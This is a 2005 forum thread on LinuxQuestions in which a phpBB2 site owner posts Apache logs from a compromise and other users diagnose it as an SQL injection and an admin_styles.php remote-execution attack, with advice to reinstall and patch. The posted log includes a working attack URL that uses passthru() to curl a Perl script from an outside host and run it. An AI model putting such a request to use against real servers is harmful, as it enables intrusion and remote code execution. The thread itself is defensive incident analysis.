LinuxQuestions.org
Did you know LQ has a Linux Hardware Compatibility List?
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 07-18-2005, 07:27 AM   #1
chris_yumm
LQ Newbie
 
Registered: Jul 2005
Posts: 2

Rep: Reputation: 0
does this mean that I have been had by this worm?


phpBB2-2.0.8a-1mdk
apache2-2.0.48-6.8.100mdk
libphp_common432-4.3.4-4.5.100mdk

I woke up this morning and I noticed that my outgoing bandwidth was being used to the maximum. I did a "top" and 2 "perl" processes were running. I killed them and the "upload" stopped. I tried to see who was logged in to the system by doing a "ps aux" and other than me and the normal root and system accounts there was nobody else. I also stopped the httpd service and had a look at access_log and these seemed like interesting lines:


72.20.3.126 - - [18/Jul/2005:01:11:31 +0100] "GET /phpBB2/ HTTP/1.1" 200 13695 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:32 +0100] "GET /phpBB2/ HTTP/1.1" 200 13539 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:33 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=46c0db294946ee2e9ab089aa91cd34c2 HTTP/1.1" 200 13799 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:34 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=46c0db294946ee2e9ab089aa91cd34c2 HTTP/1.1" 200 11267 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:35 +0100] "GrqA1g--" 200 17732 "-" "-"
72.20.3.126 - - [18/Jul/2005:01:11:36 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=46c0db294946ee2e9ab089aa91cd34c2 HTTP/1.1" 200 9396 "http://my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:41 +0100] "GET /phpBB2/ HTTP/1.1" 200 14179 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:46 +0100] "GET /phpBB2/ HTTP/1.1" 200 14015 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:51 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=189b991fba1c2b8730fa0afa0dc7f97c HTTP/1.1" 200 13800 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:55 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=189b991fba1c2b8730fa0afa0dc7f97c HTTP/1.1" 200 9101 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:55 +0100] "GrqA1g--" 200 17732 "-" "-"
69.93.68.34 - - [18/Jul/2005:01:33:01 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=189b991fba1c2b8730fa0afa0dc7f97c HTTP/1.1" 200 9396 "http://my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:17 +0100] "GET /phpBB2/ HTTP/1.1" 200 14179 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:21 +0100] "GET /phpBB2/ HTTP/1.1" 200 14015 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:22 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=c88b1b172db1fdbc20bd7d8529b057e2 HTTP/1.1" 200 13800 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:23 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=c88b1b172db1fdbc20bd7d8529b057e2 HTTP/1.1" 200 9101 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:23 +0100] "GrqA1g--" 200 17732 "-" "-"
69.93.68.34 - - [18/Jul/2005:01:36:24 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=c88b1b172db1fdbc20bd7d8529b057e2 HTTP/1.1" 200 9396 "http://www.my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:08 +0100] "GET /phpBB2/ HTTP/1.1" 200 14179 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:09 +0100] "GET /phpBB2/ HTTP/1.1" 200 14015 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:09 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=d80dd8c38162b8aeed90579c5b2f33af HTTP/1.1" 200 13800 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:10 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=d80dd8c38162b8aeed90579c5b2f33af HTTP/1.1" 200 9101 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:10 +0100] "GrqA1g--" 200 17732 "-" "-"
69.93.68.34 - - [18/Jul/2005:01:37:11 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=d80dd8c38162b8aeed90579c5b2f33af HTTP/1.1" 200 9396 "http://www.my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:51 +0100] "GET /phpBB2/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=46c0db294946ee2e9ab089aa91cd34c2&niggaip=1&niggaport=1&nigga=passthru(%22cd%20/tmp;curl%20-C%20-%20http://pandor4.gratishost.com/lollol.txt%20%3E%20a.pl;perl%20a.pl%22); HTTP/1.1" 200 7938 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"



Am I just looking at attempts or have I been had? The style of my phpBB2 board has been changed to the default one also. What can I do to see what damage has been done? I changed most of the linux passwords this morning and left httpd off for now.
 
Old 07-18-2005, 02:54 PM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
That doesn't look like it exploits this vulnerability. In fact it's likely the older "admin_styles" vuln. It is interesting that you see 4 identical sets of attacks from 2 separate IPs in close proximity, but that may not mean anything and the code itself doesn't look like it's a self-propagating worm. It just looks like the same script run several times.

As far as what happened, you can see the SQL injection attack that uses "admin_db_utilities" to drop the table holding your site data and the final URL that uses the "admin_styles.php?" vuln to upload and execute a perl script. Check the upload directory (/tmp) for a file named a.pl .

You've been running a seriously outdated version of phpBB that has several significant vulnerabilities in it and have been compromised at least once. Simply upgrading phpBB to a current version and removing any files related to the compromise may not be enough. You should really format the system and re-install from trusted media. In the future, make sure to keep up with security updates and patches, as it will save you a lot of headaches.
 
Old 07-18-2005, 02:57 PM   #3
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
//Moderator note: I'm moving this to its own thread as it isn't directly related to the original vulnerability discussion.
 
Old 07-19-2005, 02:39 AM   #4
chris_yumm
LQ Newbie
 
Registered: Jul 2005
Posts: 2

Original Poster
Rep: Reputation: 0
Darn, I had relied on the automatic vendor updates but I will not be doing that from now on. I had a look at the /tmp folder last night before formating and reinstalling and there was no .pl file. It must have been removed. Anyway, it was a learning experience. thank you!
 
Old 07-19-2005, 11:51 AM   #5
Brian Knoblauch
Member
 
Registered: Jan 2005
Distribution: SuSE (x86), NetBSD (Sparc), Solaris (Sparc & 32-bit x86)
Posts: 278

Rep: Reputation: 30
Any decent options to replace phpbb? I'm interested in using it, but the security issues with phpbb have made me NOT do it so far. Wondering if there's something better out there?
 
Old 07-19-2005, 12:34 PM   #6
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Quote:
Originally posted by chris_yumm
Darn, I had relied on the automatic vendor updates but I will not be doing that from now on.
What version of Mandrake were you running?

I had a look at the /tmp folder last night before formating and reinstalling and there was no .pl file. It must have been removed.
That's definitely troublesome as it suggests there was more activity that did not appear in the logs. Reinstalling is definitely the right move.

Anyway, it was a learning experience. thank you!
No problem. Btw, welcome to linuxquestions.
 
Old 07-22-2005, 01:54 AM   #7
tkedwards
Senior Member
 
Registered: Aug 2004
Location: Munich, Germany
Distribution: Opensuse 11.2
Posts: 1,549

Rep: Reputation: 51
Quote:
Darn, I had relied on the automatic vendor updates but I will not be doing that from now on
PhpBB is a contrib package, ie. it was packaged by somebody outside of Mandrake. Mandrake doesn't provide updates for contrib packages between distro releases and never has.

However there are about 3500 packages in main in the latest Mandrake distro all of which they provide updates for. Your Mandrake installation
will still mostly consist of those so you should keep up with automatic updates otherwise you'll probably get into even more trouble.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Possible compromise - rkhunter finds 2 (?) questionable hashes The MCP Linux - Security 3 04-02-2005 07:15 PM
Security Compromise apache Linux - Security 16 08-07-2004 11:29 PM
Has anyone seen anything posted on the bell.ca RDNS compromise? chort Linux - Security 3 12-06-2003 08:45 AM
Segfaults in commands, possible compromise? afubini Linux - Security 2 10-15-2003 07:51 AM
OpenSSH Local Root Compromise is Possible jeremy Linux - Security 0 03-07-2002 11:37 AM


All times are GMT -5. The time now is 02:38 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration